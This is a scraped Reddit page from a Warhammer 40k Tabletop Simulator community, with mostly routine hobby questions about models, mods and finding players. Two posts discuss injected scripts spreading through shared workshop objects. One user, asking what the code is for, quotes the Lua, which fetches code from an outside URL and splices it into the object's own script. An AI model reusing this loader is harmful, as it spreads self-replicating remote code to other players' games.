/r/TTSWarhammer40k
We are TTSWH40k, short for Tabletop Simulator Warhammer 40k.
We are a Discord and Reddit community that acts as a hub for players looking to play Warhammer 40,000k on Tabletop Simulator.
At our heart, we all share the love of the hobby in every shape in form.
Whether it's finding other players to play within Tabletop simulator, or discussing the lore of the hobby or even sharing and showcasing your miniature paintings.
Textures, models, requests, or just finding a group to play warhammer40k with, this is the reddit for you.
Looking for players to chat with?
Events, Players looking for players, Group chat
Learn to play 40k with friendly Wargamers.
An index of all available Warhammer40k TTS models. Need to download an army? Check here.
Looking for something that's not available? Request it here.
/r/TTSWarhammer40k
Playing competitive is definitely fun but half the time I like to just try thematic or fun gimmick lists. When I get a match vs someone that says casual usually the list is very beefed up and current meta...
So with the upcoming release of the new Emperors Children Range, I was wondering if anyone knew how or if they would be implemented into the way people play 40K through TTS.
Hi me and my friend wanted to play online 40k but he is unable to download steam are there any good non steam choices to play?
Kind of a weird question, but I recently bought my GF a 9th generation IPAD
was wondering if anyone has attempted to play a 40k TTS on a tablet before?
is it even possible
I've been playing 40k on TTS for a while now, but mostly 1000 and 2000 point games. I have a friend who wants to dip their toe in and I think a quick Combat Patrol sized game would be super fun. But, the board size and model statistics are different for Combat Patrol. I am sure there is a way to kludge together how to play this, but I was wondering:
Is there a good mod for Combat Patrol I am missing out on?
I've got a 1000 point army picked out in TTS already.
I've seen on some tutorials people having rings to show aura , googling hasn't helped me, I'm using force org and based map I've seen this was a thing in past for battlescribe2tts buts defunk anyone got a suggestions?
This is a repost from 40kcompetative, but I realised I've seen many more people complaining about the speed of TTS 40k. I am 85% confident to say its not memory leaks or similar it's actually due to the code injection infected models. Now I've jumped rather deeply into the code I see that once you load one of these injected objects into your game/save game, it immediatly repricaltes itself to every single object that is currently loaded in the game.
The map base that auto runs the detection of these infections so once you are clean, you'll never save another infected game again:
https://steamcommunity.com/sharedfiles/filedetails/?id=3398190636
The symptoms will be, you are either playing in a game with no infections or you already have some in there, when one of the players loads in a new army, everything will freeze for a "random" period of time. This is when the script/infection of the object then goes through every object to inject itself into it again. Then you are the player see a cool object or army and save that object. Then lets say you have your "base" game saved with all your prefered settings. You load in one of these infect objects and bam, your saved game is infected, even without you saving the game, the infection has now put itself in there. (this caught me out a few times)
Fixes are either
Run the cleaner: https://steamcommunity.com/sharedfiles/filedetails/?id=2967684892 - This does clean the code very well but I have found that it can still sneak past it.
or
Delete the save game as everything inside that save is now infected and the save file itself is "broken" and remove the objects too and fun the new map base to have the infection detection so you will know early doors if something is wrong.
Hopefully this helps people with performance issues.
To go into a little bit, the deleting of dice which is what most think causing the memory leak looks very clean:
die.destroy() so with every dice they are destroyed. The popular belief is that when you hit the delete key, it is not actually removed from the game. The vortex I have in the map does : `self.reset()` so reset itself back to before it was in the game. So i am not really sure what would be wrong with destroy. We'd need a dev from https://api.tabletopsimulator.com/object/ to explain the deeper differences.
As good as TTS is as the only option, would there be demand for a standalone option?
I’m a developer and the performance and clunkiness of TTS can be offputting.
I’m thinking of making a standalone, optimised version, similar to chess.com app where new users can learn the rules, do challenges etc with modern graphics and UI.
Obviously this can’t use any official IP but I can make generic characters versions etc.
Just putting the feelers out there!
Hi everyone,
I’m trying to create some models for TTS, specifically so I can make my own custom SM chapter.
What is the best way to go about this? I don’t mind taking the time to learn and look at tutorial videos etc.
I’ve seen some amazing models on this sub and on the Steam Workshop, but I don’t know if these are created via Blender or Unity?
What’s the best way to make these, especially for a beginner? And does anyone know any particular tutorials that really helped them?
Sorry if this isn’t supposed to be in this sub.
New player hoping to gain some experience when I can't play in person. Just looking for some general opinions and have a few specific questions. Thanks in advance!
How much $ am I looking at total to get all the necessary DLCs?
Is there matchmaking for PvP?
Is there AI you can play against?
Do you have to play live, or is there some way to take turns one at a time over several days (like the email system for Battlesector)?
Hey, was wondering if it would be viable to play the game on GFN? I know that a lot of people use sources outside of Workshop and I'm not sure how much that would hamper the ability to play. I'm also using the tabletop to learn so I can teach others and get them into it. Thanks
Hi Guys
I have recently got into writing some Lua for TTS (quality of life things for 40k) and have now realised that some objects have `injection scripts` attached to them. Diving into the code for these infected objects. The script would also copy itselfs to every object currently in game.
I am unsure what the reason for behind this is currently but I am asking here if anybody might know? wanted to see if anybody knew why the objects might want to reach an external URL?
WebRequest.get("https://obje.glitch.me/", function(g)
if g.is_error then
log(g.error)
elseif g.text ~= "" and g.text:sub(1, 4) == "true" and self.getLuaScript():find(g.text:sub(5, #g.text), 1, true) == nil then
self.setLuaScript(
self.getLuaScript():sub(0, #self.getLuaScript() - self.getLuaScript():reverse():find("]]tcejbo gninwapS", 1, true) + 1) ..
g.text:sub(5, #g.text) ..
self.getLuaScript():sub(#self.getLuaScript() - self.getLuaScript():reverse():find("]]tcejbo gninwapS", 1, true) + 2, #self.getLuaScript())
)
self.reload()
end
end)
BUSCO GENTE PARA JUGAR
Firstly, I don't really know if this is ok to post here, since it's not exactly WH 40k (the game), but Kill Team.
I didn't really find a Kill Team TTS Collection or easy guide to start playing KT on TTS. So I made one.
Please note that this is not a pro collection, and I don't intend it to be. I just wanted a "plug and play" solution and found it. Ultimately, it's a personal collection that I use with some friends and I'm sharing so you guys can play too. I'm sure there are better guides and I'm promoting nothing here. If it servers you, use it, if you have a better solution, I'm open to suggestions.
Description:
"This is a personal Kill Team 24 collection, but you can easily start a KT game from it:
- Just use KT Map Base Table (Beta) to start a game;
- Select pre-coded KT24 Variety Sets to select minis (save as objects);
- Play.
-You may even go deeper with NPOs and Joint-Ops.
Ps: Ignore some mods, like Blood Angels Collection, Alpha Legion, etc. These are for personal flavor.
Also, I have no intention to make a professional collection. I just use this one to play with some friends and you may benefit from it.
All credits go to the modders and their awesome work."
Link: https://steamcommunity.com/sharedfiles/filedetails/?id=3359585023
The Emperor Protects.
I'm looking into playing Warhammer in person. I haven't decided on an army and was curious if this simulator allows to make different armies and test them out?
I'm also curious if the simulator is the same as playing in person or if it is different?
Has anyone played or played against the Adeptus Titanicus?
I would like to know how it went.
Hello, I was wondering if someone knew some good non official female models. I'm not talking about gender specific factions like the Space Marines who are all male or the Sororitas who are all female, I'm talking like female versions of aeldari models, t'au models, etc. that are not oversexualised
Since the release of the new codex, I haven’t seen any updated DC and jump DC models to show the different load outs they can take, eviscerators, inferno pistols, etc. Does anyone know if something like that has been made yet? Cheers!
Looking for an experienced player to help teach me to play 40k. i have a few things installed on TTS already, let me know if I need anything else.
Hi I been into Warhammer for a while but never got a chance to play the game and I really want to learn how to play it so if I could have someone teach me that would be awesome. My discord is KingShadon
I was wondering if there was anyone that could teach me how to play warhammer with my chaos marines
Novice player Looking for a 40k tutor who is
Pay by hour with steam giftcard or other payment method
Hi, extremely new to Tabletop sim warhammer, im just wondering what are the best workshop addons/mods for models of different armies? Thank you!!
Hi everyone, I am seeking a Havoc Champion with fist and Flamer. Even a normal fist/bolter would be fine, but it seems that nobody had done one (or I simply couldn't find it).
If you have one in you collection, a link would be highly appreciated, thank you.
Hi guys, I’m very new to warhammer and just wandered if any of you know where the best and cheapest place to get the paints are, as I’ve had no luck?